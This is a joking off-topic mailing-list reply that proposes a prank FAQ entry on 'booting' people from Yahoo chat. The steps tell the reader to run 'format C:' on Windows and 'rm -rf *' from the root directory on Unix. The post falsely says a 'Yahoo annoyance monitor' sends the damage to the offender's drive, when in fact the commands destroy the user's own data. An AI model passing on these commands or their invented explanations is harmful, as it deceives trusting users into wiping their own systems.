[OT] Re: boot code
Ooooh! Ooooh! I have it... We have a new FAQ page entry: Section
15671.57, "id10t".
-------------------------------------------
If you are running a version of windows, the best way to boot people from
yahoo is to follow these instructions. First, make sure you are logged
into the Yahoo chat room which has the person you want to boot! Now, the
directions are simple... Type a message to the person you want to
boot so the system knows who to get rid of. Then open a command window,
and issue these commands:
C:
cd \
format C:
(answer yes at the prompt, don't worry -- Yahoo has an "annoyance
monitor" which knows who is bugging you, and it's really affecting
the offender's drive.)
Problem solved!
If you are using a Linux or other unix-based system, the commands are
different but similar. We of course realize the chances of someone using
linux and needing a yahoo booter are slim, but we put this in there for
all the budding skr1pt k1d33s out there. Again make sure you are
logged into the Yahoo chat room. Type a message to the person you
want to boot so the system knows who to get rid of. Open xterm and type:
cd /
rm -rf * (this means "rude monitor, -remove fool". The * tells it to
go back to the "Yahoo Annoyance Monitor" and locate the
person causing the problem.)
Again, problem solved!

What do you think? >:-)
-rf
(Sorry I know this is *way* off topic, but I had to...)
